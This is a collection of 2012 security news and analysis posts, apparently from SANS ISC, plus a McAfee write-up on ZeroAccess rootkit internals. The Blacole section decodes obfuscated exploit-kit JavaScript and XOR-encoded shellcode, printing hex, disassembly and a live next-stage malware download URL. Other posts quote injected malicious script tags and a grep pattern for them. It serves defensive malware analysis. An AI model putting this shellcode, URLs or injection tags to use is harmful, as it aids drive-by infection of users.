
Sunday, May 6, 2012

Continued interest in Nikjju mass SQL injection campaign


Readers continue to write in with updates from sources regarding the Nikjju mass SQL injection campaign. Like the Lilupophilupop campaign from December, ASP/ASP.NET sites are targeted and malicious scripts are inserted.
Be wary of <script src= hxxp://nikjju.com/r.php ></script> or <script src= hxxp://hgbyju.com/r.php ></script> and the resulting fake/rogue AV campaigns they subject victims to.
Estimates of the infected site count vary wildly, but a quick search for the above strings will give you insight. Handler Mark H continues to track this one and indicates that the MO is similar to the Lilupophilupop campaign, but that they're trying some interesting things this round. We'll report if anything groundbreaking surfaces.
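If you host ASP/ASP.NET sites yourself, a quick grep for the injected tag over saved pages or proxy logs gives a first answer; a minimal sketch, with /var/www standing in for wherever your content or logs actually live (note that in these campaigns the script tag is typically injected into database fields, so a database dump may be the better haystack):
$ grep -rilE 'nikjju\.com/r\.php|hgbyju\.com/r\.php' /var/www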
As always, if you have logs to share, send them our way via the contact form, or add a comment with any insight you want to share with readers.

OpenSSL reissues fix for ASN1 BIO vulnerability


OpenSSL has posted an updated advisory today indicating that the fix for CVE-2012-2110 released on 19APR2012 was not sufficient to correct the ASN1 BIO vulnerability for OpenSSL version 0.9.8.
Please note that this latest issue only affects OpenSSL 0.9.8v. OpenSSL 1.0.1a and 1.0.0i already contain a sufficient fix for CVE-2012-2110, as released on the 19th.
Please upgrade to 0.9.8w.
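To confirm which release you're actually running before and after the upgrade, the version banner is enough (the exact date string will vary with your build):
$ openssl version
OpenSSL 0.9.8w 23 Apr 2012
If this still reports 0.9.8v or older on the 0.9.8 branch, you need the update.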

Blacole's obfuscated JavaScript


Looking back on how we used to analyze malicious JavaScript five years ago, it is quite amazing to see the "evolution" of code obfuscation that the bad guys went through.
Most of the current obfuscation methods make heavy use of objects and functions that are only present in the web browser or Adobe Reader. Since it is unlikely that a JavaScript analysis engine on, for example, a web proxy anti-virus solution can duplicate the entire object model of Internet Explorer, the bad guys are hoping that automated analysis will fail, and their JavaScript will make it past the virus defenses to the user's browser, where it will run just fine.
Often, this actually works. The current wave of Blackhole (Blacole) exploit kits is a good example - it took anti-virus a looong time to catch on to these infected web sites. Even today, the raw malicious JavaScript block full of exploit attempts comes back with only 14/41 on VirusTotal.
 
Here's what the Blacole obfuscated JavaScript looks like:
Unlike "older" obfuscation methods, this "Blacole" encoding is almost human readable again. But automated analysis still has a tough time with it, because the code is heavy on browser objects and function prototypes:
 
None of this will run in command-line JavaScript interpreters like "SpiderMonkey". Analysis environments like Cuckoo and Wepawet are doing a pretty good job at this, but often also trip up.
If all else fails, while manual analysis of the code is tedious, it usually leads to the desired result. A bit further down in the JavaScript block, we find
This looks like a loop over the code block that replaces/transposes characters based on their ASCII code. If the ASCII Code is >25 and <52, 26 gets added to it. If it is >=52 and <78, 26 gets subtracted. Otherwise, the ASCII code remains unchanged. This is like a "poor man's Caesar Cipher", swapping out one letter against another.
Something we can readily reproduce in a couple lines of Perl :)
$ cat decode.pl
#!/usr/bin/perl -w
# Undo Blacole's "poor man's Caesar cipher": swap the two ASCII ranges back
while (<>) {
  for ($i=0; $i<length($_); $i++) {
    $c=substr($_,$i,1);              # take the next character
    $o=ord($c);                      # ... and its ASCII code
    if (($o>25) && ($o<52)) {        # first range: shift up by 26
      $k=$o+26;
    } elsif (($o>=52) && ($o<78)) {  # second range: shift down by 26
      $k=$o-26;
    } else { $k=$o };                # anything else passes through unchanged
    print chr($k);
  }
}
And, lo and behold:
$ cat malscript.js | ./decode.pl

The decoding is not yet complete (there are a couple more steps in this obfuscation), but the name and location of one of the EXEs is already apparent.

Thanks to ISC reader Jan for the sample.

Blacole's shell code


Let's assume you finished the analysis of Blacole's obfuscated Javascript (see my earlier diary today), and you are still left with a code block like this

and you wonder what it does. The first step in shellcode analysis is to "clean it up": in the case at hand, we have to remove those spurious "script" tags,
because they would trip us up in any of the following steps.
Once we're left with only the actual Unicode escapes (%uxxyy...), we can turn them into printable characters:
$ cat raw.js | perl -pe 's/%u(..)(..)/chr(hex($2)).chr(hex($1))/ge' > decoded.bin
$ cat decoded.bin | hexdump -C
00000000 41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 |AAAAf.äüüë.X1Éf.|
00000010 e9 57 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff |éWþ.0(@âúë.èëÿÿÿ|
00000020 ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 |­Ì].Áw.èL£h.£h$£|
00000030 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 |X4~£^ .óN£v.+\..|
00000040 a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 |©Æ=8××.£h.ën..]Ó|
[...]
This doesn't result in anything all that useful yet. Shellcode is in assembly language, so it wouldn't be "readable" in a hex dump anyway. But since most shellcode just downloads and runs an executable .. well, the name of the EXE could have been visible. Not in this case, because the shellcode is .. encoded one more time :).
Next step: Disassemble.
The quickest way to do so from a Unix command line (that I'm aware of) is to wrap the shell code into a small C program, compile it, and then disassemble it:
$ cat decoded.bin | perl -ne 's/(.)/printf "0x%02x,",ord($1)/ge' > decoded.c
results in
0x41,0x41,0x41,0x41,0x66,0x83,0xe4,0xfc,0xfc,0xeb,0x10,0x58,0x31,0xc9 [...]
which is the correct format to turn it into
$ cat decoded.c
unsigned char shellcode[] = {
0x41,0x41,0x41,0x41,0x66,0x83,0xe4,0xfc, [...] };
int main() { }
which in turn can be compiled:
$ gcc -O0 -fno-inline decoded.c -o decoded.obj
which in turn can be disassembled:
$ objdump -M intel,i386 -D decoded.obj > decoded.asm
and we are left with a file "decoded.asm". This file will contain all the glue logic that this program needs to run on Unix .. but we're not interested in that. The only thing we're after is the disassembled contents of the array "shellcode":
0000000000600840 <shellcode>:
 600840:       41                      inc    ecx
 600841:       41                      inc    ecx
 600842:       41                      inc    ecx
 600843:       41                      inc    ecx
 600844:       66 83 e4 fc             and    sp,0xfffffffc
 600848:       fc                      cld
 600849:       eb 10                   jmp    60085b <shellcode+0x1b>
 60084b:       58                      pop    eax
 60084c:       31 c9                   xor    ecx,ecx
 60084e:       66 81 e9 57 fe          sub    cx,0xfe57
 600853:       80 30 28                xor    BYTE PTR [eax],0x28
 600856:       40                      inc    eax
 600857:       e2 fa                   loop   600853 <shellcode+0x13>
 600859:       eb 05                   jmp    600860 <shellcode+0x20>
 60085b:       e8 eb ff ff ff          call   60084b <shellcode+0xb>
 600860:       ad                      lods   eax,DWORD PTR ds:[esi]
 600861:       cc                      int3
 600862:       5d                      pop    ebp
 [...]
A-Ha! Somebody is XOR-ing something here with 0x28 (line 600853).  If we look at this in a bit more detail, we notice an "odd" combination of JMP and CALL.
Why would the code JMP to an address only to CALL back to the address that's right behind the original JMP ? Well .. The shell code has no idea where it resides in memory when it runs, and in order to XOR-decode the remainder of the shellcode, it has to determine its current address. A "CALL" is a function call, and pushes a return address onto the CPU stack. Thus, after the "call 60085b" instruction, the stack will contain 600860 as the return address. The instruction at 60084b then "pops" this address from the stack, which means that register EAX now points to 600860 .. and xor [eax], 0x28 / inc eax then cycle over the shellcode, and XOR every byte with 0x28.
Let's try the same in Perl:
$ cat decoded.bin | perl -pe 's/(.)/chr(ord($1)^0x28)/ge' > de-xored.bin
$ hexdump -C de-xored.bin | tail -5
00000190 0e 89 6f 01 bd 33 ca 8a 5b 1b c6 46 79 36 1a 2f |..o.½3Ê.[.ÆFy6./|
000001a0 70 68 74 74 70 3a 2f 2f 38 35 2e 32 35 2e 31 38 |phttp://85.25.18|
000001b0 39 2e 31 37 34 2f 71 2e 70 68 70 3f 66 3d 62 61 |9.174/q.php?f=ba|
000001c0 33 33 65 26 65 3d 31 00 00 28 25 0a             |33e&e=1..(%.    |
Et voilà, we get our next stage URL.
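If you'd rather not eyeball hex dumps, strings(1) plus grep pulls the URL straight out of the de-XORed blob:
$ strings de-xored.bin | grep -o 'http[^ ]*'
http://85.25.189.174/q.php?f=ba33e&e=1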
If you want to reproduce this analysis, you can find the original (raw.js) shellcode file on Pastebin.

Who's tracking phone calls that target your computer? Stay Tuned to the ISC


The story I am about to tell is similar to the diaries posted by Rob VandenBrink in July 2010, Mark Hofman in May of 2011 and Daniel Wesemann in March of 2012.  This past week I got a call from someone that I thought was a regular old telemarketer, until they said they were from a company in Texas providing Microsoft Support.  The caller had a very thick Indian accent.  I played along like a dumb user (the lady kept getting very angry with me when I asked her to repeat things and said I didn't understand :)  I got to look at my logs by running "eventvwr" from the Run prompt. In my application logs, I found out that warning and error messages were really "viruses" and I should not click on them because they would multiply and destroy my motherboard.  I also got to run "inf virus" (which just opens the Windows inf folder and disregards the word "virus") and was asked if I had downloaded those files.  Of course I said no, and she told me they were viruses and all sorts of evil things that had been downloaded to my computer.  She then said that Microsoft had developed a very special piece of software that would take care of all of this for me and she would help me.  She asked me to now type "www.logmein123.com" at the Run line.  At this point, 40 minutes later, I told her I had to go somewhere.  I asked if I could call her back, because I sure didn't want all that stuff on my computer.  She said I could, gave me the number 773-701-5437, and said her name was Peggy.  I didn't have time to finish the call, but I sure would have liked to have fired up a VM and seen what "special software" she had for me to install.
After the call, I started researching this type of scam and was surprised to see that it seems to date back to the 2009 time frame.  However, I could not find any statistics tracking this data.  Maybe I am just looking in the wrong place.  I saw guidance ranging from contacting your local law enforcement to sending an email to antiphishing.org.  I checked antiphishing.org and could not find any data on this trend, nor is there any mention in their report released 26 April 2012 that summarized 2H2011.  It states "This report seeks to understand trends and their significances by quantifying the scope of the global phishing problem. Specifically, this new report examines all the phishing attacks detected in the second half of 2011 (“2H2011”, July 1, 2011 through December 31, 2011)."   This type of phishing is something APWG doesn't appear to track at this time.
I consider these calls to still be phishing attempts, because APWG defines phishing as "a criminal mechanism employing both social engineering and technical subterfuge to steal consumers’ personal identity data and financial account credentials."  The delivery vector is not email in this case but rather a phone call; the end result is still the same.  So, where does that leave us for tracking the trend of fake calls whose target is your computer?
At this point in time, there is no central tracking of this type of delivery vector.  However, stay tuned to the ISC.  After discussing this with some of the other handlers, the ISC is going to set up a method for reporting these attempts to us for tracking and trending this delivery method.  More will be posted in the near future as soon as the details are worked out.

UPDATE:  The page for reporting these types of calls is now available at isc.sans.edu/reportfakecall.html.  Please let us know what you think and if we have missed anything.

Workaround for Oracle TNS Listener issue released !


Just a quick update to Johannes's story on the 27th about the Oracle TNS listener vulnerability (http://isc.sans.edu/diary.html?storyid=13069)

We received two updates from our readers on this today:
Reader "anothergeek" posted a comment to Johannes's story, noting that Oracle released a workaround today (Apr 30) - find details here ==> http://www.oracle.com/technetwork/topics/security/alert-cve-2012-1675-1608180.html

Shortly after, reader R.P. pointed us to a page that had a proof of concept (with a video, no less) ==> http://eromang.zataz.com/2012/04/30/oracle-database-tns-poison-0day-video-demonstration/
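For reference, the heart of Oracle's recommended workaround is a one-line listener.ora change that restricts instance registration to local IPC; a minimal sketch (the parameter carries your listener's name, so adjust LISTENER accordingly, and read the alert above for the full Class of Secure Transports configuration before touching production):
# listener.ora - only accept instance registration over local IPC
SECURE_REGISTER_LISTENER = (IPC)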


So get that maintenance window scheduled folks!  Those patches don't do you any good in your Downloads folder!

From the perspective of someone who does audits and assessments, it's a sad thing to note that in many organizations it's tough to schedule maintenance on a large Oracle server.  So many applications get piled on these that database and operating system patches can be a real challenge to book, because an interruption in service can affect dozens or hundreds of applications.

Sadly this means that database patches are often quarterly or annual events.  Or "fairy tale events" (as in never-never).

FCC posts Enquiry Documents on Google Wardriving


Remember back in 2010, when Google was in hot water for some wardriving activities, where personal information was gathered from unencrypted wireless networks found during its Streetview activities?  Deb wrote this up here ==> https://isc.sans.edu/diary.html?storyid=8794

Well, it looks like the discussion won't die - the FCC has just posted a summary of its findings here, along with some good background and a chronology of events in their investigation ==> http://transition.fcc.gov/DA-12-592A1.pdf

You'll notice that it's heavily redacted.  A version with much less redacting can be found here ==> http://www.scribd.com/fullscreen/91652398

It's very interesting reading.  What I found most interesting in the paper was:
  • I thought it was sensible that the engineer didn't go write a new tool for this - they used Kismet to collect the data, then massaged Kismet’s output during their later analysis. Anyone who's been in almost any SANS class would realize how wrong using the tool this way was, but at least they didn't go write something from scratch.
  •  Page 2 outlines the various radio licenses held by Google.  This caught my eye mostly because I'm in the process of studying up for my own license. 
  • The suggestion and implementation for the data collection in the controversy came from unnamed engineers ("Engineer Doe" in the paper).  I found it really interesting how the final "findings" document doesn't name actual names - I'd have thought that assigning responsibility would be one of the main purposes of this doc, but hey, what do I know?
  • Engineer Doe actually outlined in a design document how the tool would collect payloads (page 10/11), but then discounted the impact because the Streetview cars wouldn't "be in close proximity to any given user for an extended period of time".  The approval for the activity came from a manager who (as far as this doc is concerned) didn't understand the implications of collecting this info, or maybe didn't read the doc, or missed the importance of that section  - though a rather pointed question about where URL information was coming from was lifted out of one critical email.
Needless to say, violating Privacy Legislation "just a little bit" is like being a little bit pregnant - the final data included userids, passwords, health information, you name it.  As they say "close only counts in horseshoes and hand grenades" - NOT in Compliance to Privacy rules !

Long story short, this document outlines how the manager(s) of the project trusted the engineer's word on the legal implications of their activity.  I see this frequently in my "day job".  Managers often don't know when to seek a legal opinion - in a lot of cases, if it sounds technical, it must be a technical decision, right?  So they ask their technical people.  Or if they know that they need a legal opinion, they frequently don't have the budget to go down this road, so they are left on their own to take their best shot at the "do the right thing" decision.  As you can imagine, if the results of a decision like this ever come back to see the light of day, it seldom ends well.   Though in Google's case, they have a legal department on staff, and I'd imagine that one of their primary directives is to keep an eye on Privacy Legislation, Regulations and Compliance to said legislation.  Then again, you can't fault the legal team if the question never gets directed their way (back to middle management).

From a project manager's point of view, this nicely outlines how expanding the scope of a project without the approval of the project sponsor is almost always a bad idea.  In most cases I’ve seen, the implications of changing the scope are all about impacts to budget and schedule, but in this case a good idea and a neat project (Google Streetview) ended up being associated with activity that was later deemed illegal, which is a real shame.  From a project manager's perspective, exceeding the project scope is almost as bad a failure as not meeting the scope.   Exceeding the scope means that either you exceeded the budget or schedule, mis-estimated the budget or schedule, or, in this case, didn't get the legal homework done on the scope overage.

Take a minute to read the FCC doc (either version).  It's an interesting chronology of a technical project's development and execution, mixed in with company politics, legal investigation and a liberal sprinkling of "I don't recall the details of that event" type statements.  Not the stuff that blockbuster movies are made of, but interesting nonetheless !

We invite your opinions, or any corrections if I've mis-interpreted any of this - please use our COMMENT FORM.  I've hit the high points, but I'm no more a lawyer than "Engineer Doe" is.

Comments open for NIST-proposed updates to Digital Signature Standard


The comment period for the National Institute of Standards and Technology's (NIST) proposed changes to the Digital Signature Standard (FIPS 186-3) is open until May 25, 2012. Submit comments via fips_186-3_change_notice at nist dot gov, with "186-3 Change Notice" in the subject line.
The proposed changes include:
  • "clarification on how to implement the digital signature algorithms approved in the standard: the Digital Signature Algorithm (DSA), the Elliptic Curve Digital Signature Algorithm (ECDSA) and the Rivest-Shamir-Adelman algorithm (RSA)"
  • "allowing the use of additional, approved random number generators, which are used to generate the cryptographic keys used for the generation and verification of digital signatures"
NIST indicates that "the standard provides a means of guaranteeing authenticity in the digital world by means of operations based on complex math that are all but impossible to forge" but that "updates to the standard are still necessary as technology changes."
Comments and feedback on your digital signature implementations are welcome via our comments form.

An Impromptu Lesson on Passwords ..


I was reading the other night, which since I've migrated my library means that I was on my iPad.
My kid (he's 11) happened to be in the room, playing a game on one console or another.  I'm deep in my book, and he's deep in his game, when he pipes up with "Y'know Dad?"
"Yea?"
"You should enable complex passwords on your tablet"
(Really, he said exactly that!  I guess he was in Settings / Security and wasn't playing a game after all!)
"Why is that?" I said - (I'm hoping he comes up with a good answer here)
"Because if somebody takes your tablet, it'll be harder for them to guess your password"  (good answer!)
"Good idea - is there anything else I should know?"
"If they guess your password wrong 10 times, your tablet will get wiped out, so they won't get your stuff"  (Oh - bonus points!)
So aside from me having a really proud parent moment, why is this on the ISC page?  Because it's really good advice, that's why!
It's surprising how many people use the last 4 digits of their phone number, their birthday, or worse yet, their bank card PIN (yes, really) for a password, or have no password at all.  And yet, we have all kinds of confidential information on our tablets and phones - mostly in the form of corporate emails and sometimes documents.
As is the case in so many things, when we in the security community discuss tablet security, it's usually about the more advanced and interesting topics like remote management, remote data wipe or forensics.  These are valuable discussions - but in a lot of cases, basic (and I mean REALLY BASIC) security 101 advice to our user community will go a lot further in enhancing our security position.  Advice like I got from my kid:
  • Set a password!
  • Make sure that it's reasonably complex (letters and numbers)
  • Make sure that it's not a family member's name, phone number, birthday, bank PIN or something that might be found on your Facebook page
  • Set a screen saver timeout
  • Set the device to lock when you close the cover
  • Delete any documents that you are finished with - remember, the doc on your tablet is just an out-of-date copy
This may seem like really basic advice, and that's because it is.  But in the current wave of BYOD (Bring Your Own Device) policies that we're seeing at many organizations, we're seeing almost zero attention paid to the security of the organization's data.  BYOD seems to be about transferring costs to our users on the one hand, and on the other, keeping them happy by letting them use their tablets and phones at work (or school).
Good resources for iPad security (as well as Android and other tablets) can be found in the SANS Reading Room (http://www.sans.org/reading_room/).
Vendors also maintain security documentation - Apple has some good (but basic) guidance at ==> http://www.apple.com/ipad/business/docs/iPad_Security.pdf
Please, use our COMMENT FORM to pass along any tablet security tips or links you may have.

Monitoring VMWare logs


Virtualization is so popular today that there is almost no company that does not use a virtualization platform. VMWare is definitely the most popular one (at least the one I seem to run into most often).
It is also not uncommon to see VMWare farms growing exponentially, as people tend to throw more hardware at them and just create new VMs. In such cases, controlling what your administrators do is a must, yet organizations that audit their VMWare farms (and especially administrators’ activities) are pretty rare.
One of the problems is that reviewing VMWare logs can be complex, so it is not easy to set up the whole log collection and analysis system correctly; this is something a lot of SIEMs and similar log collection and analysis tools fail at. So let’s see what we have to work with here and how we can improve things.
System components
For the sake of this diary, I’ll write mainly about the “typical” setups today that consist of ESXi (or ESX, for older setups) host servers and one or more vCenter management servers.
ESXi is VMWare’s host operating system that actually runs the virtual machines. It is highly optimized and has a footprint of only 150 MB. This is what is usually installed on those big servers that today run 20+ virtual machines.
Of course, when you have more than one ESXi server, you want to manage them centrally, not only to make management easier but also to allow more sophisticated features such as vMotion. This management is done through a vCenter server.
vCenter runs on a normal Windows machine, which can itself be a VM. Administrators normally use the VMWare vSphere client application to connect to vCenter and manage virtual machines (depending, of course, on their roles and permissions).
The same client (the vSphere client) can be used by an administrator to connect directly to an ESXi server and manage the VMs hosted on that server. As you can probably guess, this creates problems for activity auditing: in this case, any changes are performed directly on the ESXi host server, so vCenter will not see those activities.
Finally, if you are trying to troubleshoot some problems, you can allow SSH access directly to the ESXi hosts – this access is disabled by default, but I quite often find that organizations enable it and leave it enabled.
Log collection
We can see that there are multiple system components that generate logs that we should be collecting. While vCenter keeps its own logs and allows reviews from the console, ESXi hosts will also independently keep their logs that should be audited. Actually, when an administrator modifies something in vCenter, a task will be created that will cause vCenter to connect to the target ESXi host and issue the change.
At the moment I’m usually recommending that clients collect logs from the following components:
  • vCenter logs. What I’ve found is that the VMWare SDK API allows much easier retrieval of logs that will be nice and structured but, if your SIEM does not support it directly, you will have to code a script to retrieve such logs yourself. Of course, do not forget about the OS logs as well as the database logs – since this server is the most important one, make sure that you’ve protected it accordingly and that you collect all other log files that might be important.
  • ESXi host logs. These are also very important, since an administrator can connect directly to the hosts (unless this has been prevented). With ESXi there aren’t many options, and probably the best one is to configure the local Syslog daemon to send logs to a central Syslog server, as shown in the picture below (or scripted from the command line, as sketched after it).
VMWare Syslog settings
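If you prefer to script this instead of clicking through the vSphere client, ESXi 5.x exposes the same setting through esxcli; a minimal sketch, with syslog.example.com standing in for your own collector:
# send logs to the central collector (run in the ESXi shell)
esxcli system syslog config set --loghost='udp://syslog.example.com:514'
# reload the syslog daemon so the new destination takes effect
esxcli system syslog reload
# allow outbound syslog through the ESXi firewall
esxcli network firewall ruleset set --ruleset-id=syslog --enabled=true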

Keep in mind, though, that VMWare creates many multi-line log entries, which will eventually get broken up due to Syslog's size limits, so correlating them on the server side might be quite difficult, if not impossible.
By using Syslog we will also take care of SSH logins, since these will be logged by the console and sent through Syslog to the central server.
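Once the logs are flowing, even a simple grep on the collector will show who is using that SSH access; a minimal sketch, with the path being wherever your syslog server files the ESXi messages:
$ grep -E 'sshd.*(Accepted|Failed)' /var/log/esxi/*.log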
Auditing
Now that we have all the logs in one place, we can correlate them and set up alerts on suspicious activities.
Regular log reviews are very important. One of the things you should particularly look at is console access. For example, if an administrator who accessed a server’s console through vCenter forgot to log out, any other vCenter administrator can access that server’s console (provided he has the vCenter permissions to access it, of course).
Good log collection and correlation (remember to collect both vCenter logs as well as logs from all your guest servers) can tell you which server’s consoles were accessed as well as if the administrator had to log in or not.
So check your VMWare environments today and see if you can answer these questions: who logged in to my vCenter console, from where and when? Which VMs were migrated? And which consoles have been accessed by which administrator in the last 30 days?
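For the first of those questions, even a crude grep over the collected vCenter (vpxd) logs is a workable starting point; message formats differ between vCenter versions, so treat this as a sketch rather than a recipe:
$ grep -i 'login' vpxd-*.log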

Let us know what your experiences with collecting and analyzing VMWare logs are and if you did something you’d like to share with our readers so everyone can benefit from your work.

Are Open SSIDs in decline?


After hearing about my wife's iPad disconnecting from wireless for a couple of weeks (ok, maybe a bit longer than that), I decided to do some upgrades to the home network and replace the problem Access Point (an older home unit).
So off to the store I went, and came home with a bright shiny new A/B/G/N AP.  After throwing the DVD away (you know, the one that comes in every box with the outdated firmware on it), and updating the unit to the current rev, my kid and I started setting it up.

It's been a while since I worked on a standalone AP - my builds normally involve controllers and *lots* of APs.  So imagine my surprise and joy when I found that these home units no longer default to an SSID with a default name and no security!  This one started the setup by defaulting to WPA2 / Personal, and asked me what I wanted to use for a key!  You really have to be determined now to create an Open SSID (good news!)

So are we looking at the long, slow goodnight of open wireless on home networks?  I've written in the past about how tablet users who don't know better routinely "steal" wireless from whoever is close without thinking twice - is this going to get harder and harder for them over the next few years, as people migrate to newer APs?
On the other hand, we're seeing more and more guest networks that are open: coffee shops, municipal offices, hair salons - pretty much anyplace you're likely to spend more than 5 minutes at seems compelled to offer up free wireless.  But using free wireless that's offered to you is a much different proposition than stealing it from someone who's misconfigured their home network.

I invite your comments - my AP's name starts with an L and ends with an S (made by our friends at C***o).  Are the current models from other vendors implementing better defaults now too?

Helping the helpdesk help you


What happens when your helpdesk gets a call from a frantic staff member who’s positive his computer is being hacked by Government X this very second?

The IT helpdesk is the face, voice or automated greeting that most staff and/or customers get to deal with when calling for help*. Most IT helpdesk staff have run sheets or scripts to walk the caller through common problems or perform basic tests. With scripts and the frequency of typical requests, helpdesk staff can become very slick and effective, making everyone's lives easier.  But what happens when a call comes through and it might be a security issue?
Here are some questions to pose to your organisation:
  1. Has there ever been any discussion between the helpdesk and security teams on what should be done if the call is security related?
  2. Is it scalable, in time and workload, to have every possible security-related call routed to the security team to answer?
  3. Should the IT helpdesk staff be provided scripts for basic security procedures, other than “Tell them to touch nothing, and then call me!”?
Each workplace and environment has its own unique factors in how security-related calls are handled, but let’s imagine the security team doesn’t want to field every call that may or may not have anything to do with a security issue. This is where a helpdesk team could, with guidance and coaching, be invaluable in saving time and effort for all parties.
A crucial first step is to define what the helpdesk should do and what they should definitely not do. This sets clear lines of demarcation, preventing the misunderstandings that can occur in the heat of the moment when someone attempting to do what they believe is the right thing ends up causing an awful mess.

On the “do” list are:
- Get a clear description of the problem
- Provide standard details on the caller (username, computer details, IP address, location and so on)
- Record only the facts.

On the “should not do” list are:
- Connect to the system to try and fix it themselves
- Offer advice on how to fix the problem
- Jump to unsupported conclusions
- Take any other action that may cause harm or impact.

From this point onwards both the security and helpdesk teams have some ground rules and can work together without causing problems.

Feel free to add any comments, thoughts or suggestions on your experiences, good or bad, on solving this problem.

Chris Mohan--- Internet Storm Center Handler on Duty

* Help – this covers actual questions on topics the IT helpdesk staff are trained in, rather than random questions such as why the fridge isn’t working. In case you were wondering, the correct answer was that the fridge’s fuse had blown. Obvious, really...

Vulnerability Assessment Program - Discussions

On a slow Saturday in May I thought I would open the forum here at the ISC for discussion on a topic.  I am working on a project to update the Continuous Vulnerability Assessment (CVA) capability for a client, and I have found a lot of good information on the web.  What I haven’t found a lot of is good experiences.  Guy Bruneau wrote a great article in October on CVA and Remediation for the Critical Controls.

First off, what is a vulnerability assessment?  Wikipedia defines a vulnerability assessment as “the process of identifying, quantifying, and prioritizing (or ranking) the vulnerabilities in a system”.  Vulnerability assessments are often confused with penetration testing; however, these two functions serve different roles in the organization and in the overall security assessment.  A CVA program, as a component of the overall enterprise systems management program, needs to consider the processes for asset identification, vulnerability reporting and remediation.

The information I have collected runs the gamut of technical and marketing material.  A great report on assessment tools is available here.  Search the web for “Vulnerability Assessment”, “Continuous Vulnerability Assessment”, or “CVA” and the results range widely: technical, marketing, best practices, etc.  What is not abundant is experiences.  What I’m asking of you today is input on the experiences and challenges that you've encountered in your implementation or update of a CVA program. I’d love to hear about both the technical and environmental challenges encountered along the way.  Ask yourself “If I had to do it differently, what would I change?”; that’s what I would like to hear.

Tuesday, May 1, 2012


LAN Messenger <= v1.2.28 Denial of Service Vulnerability



Mikrotik Router Denial of Service



OpenCart 1.5.2.1 Multiple Vulnerabilities



GENU CMS 2012.3 - Multiple SQL Injection Vulnerabilities



Wordpress Zingiri Web Shop Plugin <= 2.4.2 Persistent XSS



MyClientBase v0.12 - Multiple Vulnerabilities



STRATO Newsletter Manager Directory Traversal



SAMSUNG NET-i Viewer 1.37 SEH Overwrite



McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability



McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 ActiveX Control GetObject() Security Bypass Remote Code Execution



Is ‘SexyDefense’ The Future of Anti-Espionage?


At the recent SOURCE Boston conference, one presentation that caught my attention was called SexyDefense - Maximizing the home-field advantage.
This was quite a thought-provoking presentation that was based on the old concept that offense is always the best defense.
Basically, the idea is to profile your attacker(s) and subsequently modify their attack tools to something that you can silently detect. The premise is that they continue to use their attack tool because they believe they are going undetected.
During the talk, the speaker gave one example of a cryptor which had been marketed as fully undetectable. In reality, there was an anti-virus program which did detect files crypted using this cryptor. As a result, they (the defenders) hacked the server, modified the cryptor to make it truly undetectable statically, and added silent detection/protection on their end.
Obviously, there are some very clear ethical and legal issues with this approach.
Those issues aside, this approach forces us to ponder the question: Is this the possible future in the (anti-)espionage era?
When dealing with cyber-espionage you can never have enough intelligence. And this approach is certainly a very interesting one to go about gathering more intel.
I'm not a fan of using vigilante tactics. But as more companies and industries grow increasingly frustrated with cyber-espionage/APT, I do expect to see an increase in the use of offense as defense.
Interesting times.

Targeting ZeroAccess Rootkit’s Achilles’ Heel


Proliferation

ZeroAccess is one of the most talked- and blogged-about [1][2] rootkits in recent times. It is also one of the most complex and highly prevalent rootkits we have encountered, and it is continuing to evolve. The ZeroAccess rootkit is distributed both via social engineering and by exploitation. A recent blog post by our colleagues at McAfee describes some of the odd methods this rootkit adopts to get installed on machines without being noticed.
One of the goals of this rootkit is to create a powerful peer-to-peer botnet, which is capable of downloading additional malware onto the infected system. This botnet is reportedly involved [3] in click fraud, downloading rogue antivirus applications, and generating spam.
This Google map of the United States shows McAfee VirusScan consumer nodes reporting unique ZeroAccess detections during the past week.
Our consumer data for the past month shows close to 4,000 unique systems detecting ZeroAccess daily. And the trend is continuing upward.

Installation

In my recent analysis of this rootkit, I wanted to understand its initial installation mechanism. The installation of ZeroAccess involves overwriting a legitimate driver on disk with the malicious rootkit driver. Step 1 usually varies among variants: some variants directly overwrite a legitimate driver, while others first inject the malicious code into trusted processes like explorer.exe and then overwrite the driver from the injected code (this is done to bypass various security products and to make analysis more challenging). During Step 1, the original driver code is kept in memory. The driver that is overwritten in Step 2 is randomly selected (details here [1]). In our discussion below we assume CDROM.sys is being overwritten. Steps 2 through 8 are fairly static across variants of ZeroAccess. Once the driver is overwritten by malicious code, it is loaded in kernel space. The first task of the kernel-mode code is to set the malware up to survive reboots and to forge the view of the overwritten driver (CDROM.sys).
Let's move on to see how this scheme works in Steps 5 through 8. In Step 5, ZeroAccess intercepts disk i/o by hooking the DeviceExtension->LowerDeviceObject field in the \driver\disk DEVICE_OBJECT. So now any disk i/o goes through the rootkit’s malicious routine. In Step 6, the kernel-mode code has access to a clean image of the CDROM.sys driver stored in memory. To survive reboots, it flushes the file to disk using the ZwFlushVirtualMemory API. The request to flush the clean image is, interestingly, sent to the file CDROM.sys, which at first glance looks counterintuitive. Why would the rootkit want to write the clean image to the file it just infected in Step 2? Looking more closely, the rootkit actually uses its disk i/o redirection framework. So, when this request to store the clean image of the file on disk travels through the virtual driver stack shown in Step 7, it is encrypted and redirected (Step 8) to the rootkit’s “protected” folder, created in Step 3, instead of going to the actual CDROM.sys.


Once the original encrypted image of CDROM.sys is stored in the protected folder, the infection becomes persistent and can easily survive reboots. Any attempt to read the infected CDROM.sys has to traverse the hijacked i/o path, in which the rootkit decrypts the original file from its protected storage on the fly and presents the clean image, thus forging the view of the file to security tools. Also, during a reboot the infected file first loads the malicious code into the kernel, which can then refer to its “protected” folder and load the original file, thus ensuring the uninterrupted functionality of the original device.
To clean this threat, security tools have to take several steps, repairing memory or decrypting the file in its protected folder so that they can restore the original file. Also, once the rootkit is active in kernel mode, it takes a lot of evasive steps to kill or circumvent security tools, as described by our colleagues in this Virus Bulletin article. So repair becomes even more challenging and research more costly.

Impact of real-time kernel monitoring

For more than a year I tested many variants of this rootkit family against McAfee’s Deep Defender technology, which provides real-time protection against unauthorized kernel-memory modifications. The following screenshot shows Deep Defender blocking the DeviceExtension hijack attempt in Step 5, which was critical to the rootkit’s survival. Once this hook was blocked, the machine was cleaned after a reboot, without any fancy repairs. This shaved days off reverse engineering and writing custom repairs against this rootkit and its multiple variants. It seems Deep Defender has found the Achilles’ heel of this rootkit.

How did Deep Defender clean the machine?

